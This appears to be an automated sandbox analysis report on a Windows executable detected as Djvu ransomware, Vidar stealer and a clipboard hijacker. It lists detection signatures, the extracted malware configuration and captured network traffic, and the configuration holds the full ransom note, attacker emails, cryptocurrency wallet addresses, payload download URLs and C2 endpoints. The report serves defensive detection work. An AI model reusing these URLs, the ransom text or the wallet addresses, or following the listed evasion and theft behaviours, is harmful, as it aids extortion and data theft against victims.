Windows Analysis Report
U59WtZz2Sg.exe

Overview

General Information

Sample Name: U59WtZz2Sg.exe
Analysis ID: 756302
MD5: 41001fdd7879ce9ede214e92c7e492be
SHA1: 215964b0399da37b41b7f420806a72feb72a7c28
SHA256: aaef58ede9edbfc0cbbdd3dc7abfa9ae0f977ed1b33af4f5d7665123187801d1
Tags: exeTeamBot

Detection

Babuk, Clipboard Hijacker, Djvu, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found ransom note / readme
Yara detected Babuk Ransomware
Antivirus detection for URL or domain
Yara detected Clipboard Hijacker
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign process
Writes many files with high entropy
Writes a notice file (html or txt) to demand a ransom
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Drops certificate files (DER)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Uses cacls to modify the permissions of files
Contains functionality to launch a program with higher privileges
Found evaded block containing many API calls
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapter information

Classification

AV Detection

Source: http://uaery.top/dl/build2.exeJ_ Avira URL Cloud: Label: malware
Source: http://fresherlights.com/files/1/build3.exerun Avira URL Cloud: Label: malware
Source: http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=trueW Avira URL Cloud: Label: malware
Source: http://fresherlights.com/files/1/build3.exe( Avira URL Cloud: Label: malware
Source: http://uaery.top/dl/build2.exe Avira URL Cloud: Label: malware
Source: http://uaery.top/dl/build2.exe$run Avira URL Cloud: Label: malware
Source: http://fresherlights.com/test1/get.php Avira URL Cloud: Label: malware
Source: http://fresherlights.com/files/1/build3.exe$run Avira URL Cloud: Label: malware
Source: http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true Avira URL Cloud: Label: malware
Source: http://uaery.top/dl/build2.exerunk6 Avira URL Cloud: Label: malware
Source: U59WtZz2Sg.exe Virustotal: Detection: 36%
Source: uaery.top Virustotal: Detection: 21%
Source: fresherlights.com Virustotal: Detection: 18%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build2[1].exe ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe ReversingLabs: Detection: 92%
Source: U59WtZz2Sg.exe Joe Sandbox ML: detected
Source: 14.0.mstsca.exe.ee0000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 14.2.mstsca.exe.ee0000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 11.2.build3.exe.b90000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 11.0.build3.exe.b90000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://fresherlights.com/files/1/build3.exe"], "C2 url": "http://fresherlights.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-5UcwRdS3ED\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0609djfsieE", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", 
"C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local
Source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://t.me/asifrazatg", "Botnet": "517"}
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack Malware Configuration Extractor: Clipboard Hijacker {"Crypto Addresses": ["DBbgRYaKG993LFJKCWz73PZqveWsnwRmGc", "3NLzE3tXwoagBrgFsjNNkPZfrESydTD8JP", "MBD2C8QV7RDrNtSDRe9B2iH5r7yH4iMcxk", "ltc1qa5lae8k7tzcw5lcjfvfs3n0nhf0z3cgrsz2dym", "addr1qx4jwm700r2w6fneakg0r5pkg76vu7qkt6qv7zxza3qu3w9tyahu77x5a5n8nmvs78grv3a5eeupvh5qeuyv9mzpezuq60zykl", "0xa6360e294DfCe4fE4Edf61b170c76770691aA111", "42UxohbdHGMYGPvW5Uep45Jt9Rj2WvTV958B5G5vHnawZhA4UwoD53Tafn6GRmcGdoSFUfCQN6Xm37LBZZ6qNBorFw3b6s2", "89SPVUAPHDLSq5pRdf8Eo6SLnKRJ8BNSYYnvPL6iJxGP4FBCBmkeV3CTSLCbk6uydxRnub4gLH6TBRycxSAQN2m1KcnhrSZ", "LLiNjWA9h4LxVtDigLQ79xQdGiJYC4oHis", "t1VQgJMcNsBHsDyu1tXmJZjDpgbm3ftmTGN", "bnb136ns6lfw4zs5hg4n85vdthaad7hq5m4gtkgf23", "Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPE", "1My2QNmVqkvN5M13xk8DWftjwC9G1F2w8Z", "bc1qx8vykfse9s9llguez9cuyjmy092yeqkesl2r5v"]}
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_0040E870
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_0040EAA0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 1_2_00410FC0
Source: U59WtZz2Sg.exe, 00000005.00000003.540487888.00000000031B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: U59WtZz2Sg.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\_readme.txt
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\_readme.txt
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\gahu\juviru.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dismhost.pdbGCTL source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dismhost.pdb source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 9`C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb0h source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: U59WtZz2Sg.exe, 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: #C:\gahu\juviru.pdb0f source: U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00403341 GetModuleHandleW,GetNamedPipeHandleStateW,InterlockedExchange,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedCompareExchange,GetConsoleTitleA,GetLogicalDriveStringsW,FlushFileBuffers,GetShortPathNameA,GetComputerNameExA,CopyFileW,CloseHandle,LoadLibraryA,InterlockedIncrement,InterlockedIncrement,GetCharWidthA,CreateNamedPipeW,WinHttpSetOption,GlobalFlags,FindFirstVolumeA,CreateJobObjectA,GetModuleHandleW,FindResourceA,GetHandleInformation,CancelTimerQueueTimer,VerifyVersionInfoA,InterlockedIncrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetCPInfoExW,GetBinaryTypeA, 0_2_00403341
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_00410160
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_0040F730

Networking

Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.5:51441 -> 8.8.8.8:53
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.5:49705 -> 116.121.62.237:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.5:49705 -> 116.121.62.237:80
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 222.236.49.123:80 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.5:49706 -> 222.236.49.123:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.5:49706 -> 222.236.49.123:80
Source: Malware configuration extractor URLs: http://fresherlights.com/test1/get.php
Source: Malware configuration extractor URLs: https://t.me/asifrazatg
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /517 HTTP/1.1 Host: 88.198.94.71
Source: global traffic HTTP traffic detected: GET /176356074953.zip HTTP/1.1 Host: 88.198.94.71 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1417805488924803 Host: 88.198.94.71 Content-Length: 131097 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:22:17 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 Last-Modified: Tue, 29 Nov 2022 16:00:02 GMT ETag: "40800-5ee9e14abb179" Accept-Ranges: bytes Content-Length: 264192 Connection: close Content-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:22:26 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT ETag: "2600-5c86757379380" Accept-Ranges: bytes Content-Length: 9728 Connection: close Content-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: GET /asifrazatg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: t.me
Source: Joe Sandbox View ASN Name: CJNET-ASCheiljedangCoIncKR
Source: Joe Sandbox View IP Address: 116.121.62.237
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://aka.ms/rmsfaq)
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://aka.ms/rmssdk)
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://aka.ms/sia
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://aka.ms/yqwsi2)
Source: U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://creativecommons.org/ns#
Source: U59WtZz2Sg.exe, 00000001.00000002.309400317.0000000000894000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.306241286.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308057042.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.306100466.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: U59WtZz2Sg.exe, 00000005.00000003.536209004.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.536117643.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant
Source: U59WtZz2Sg.exe, 00000005.00000003.385085396.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.522838758.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388272737.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.487679398.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.542575948.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.488792776.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/files/1/build3.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/files/1/build3.exe$run
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/files/1/build3.exe$runU
Source: U59WtZz2Sg.exe, 00000005.00000003.385085396.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.522838758.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388272737.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.487679398.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.542575948.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.488792776.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/files/1/build3.exe(
Source: U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/files/1/build3.exerun
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.576922763.00000000008C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/test1/get.php
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=trueW
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/test1/get.phpg
Source: U59WtZz2Sg.exe, 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
